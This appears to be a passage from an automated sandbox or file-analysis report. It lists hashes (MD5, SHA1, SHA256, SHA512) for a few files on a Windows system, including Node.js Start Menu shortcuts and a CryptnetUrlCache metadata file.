| MD5 | 7447652ef22ae66e1f7c284bd1e7cce5 |
| SHA1 | 8af7397906b478ace48d55ef27ce563ab50a891d |
| SHA256 | 259c8a7c0d5099d16250ec2e696f609254ee6532ce7ab21bb4dcdf26802fecaa |
| SHA512 | 1f597e1bad991efeda8ae20db22168080662c02925fcbbfa1aec788ca749dc909d813e8cf058a6874fcadb849db9fae078b4ae5a257757b08babb2df107bf3c4 |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Install Additional Tools for Node.js.lnk
| MD5 | 26c75574a7ce9e53fc65bc05b1e9b683 |
| SHA1 | 28a42b91e3eb6d21dafce2f0756abd378b0a5e96 |
| SHA256 | eb962b2df12c33e679bf57a2aa324e134152c0f05d816fd56ca1c66532b74cf3 |
| SHA512 | d85acaefdf13ef457ee66240858ec60b81b3f3268b48506ce1ce0e7b5ddcd193358f7bf2c3336a84f871156ff00dff3aaff99ee8415516260d60d2ca8044ec25 |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.url
| MD5 | 35b86e177ab52108bd9fed7425a9e34a |
| SHA1 | 76a1f47a10e3ab829f676838147875d75022c70c |
| SHA256 | afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319 |
| SHA512 | 3c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
| MD5 | 09a6820310f95d9488aa51ee3c7d5f48 |
| SHA1 | 4aa28ea7490ea351566e10845454797aed236e9b |
| SHA256 | eee606110023b620c9c70d14fd1431cb7521be2cf060a24b6742d4e96be3e756 |
| SHA512 | 982610707d08a8da4671cb054766c86d3a3ba15f66729a32ab4dab65d82cba5fee4b5f6662e5b052eb651d37aa663528bd2e1fba9fe6a5ac11274c0f5cf92566 |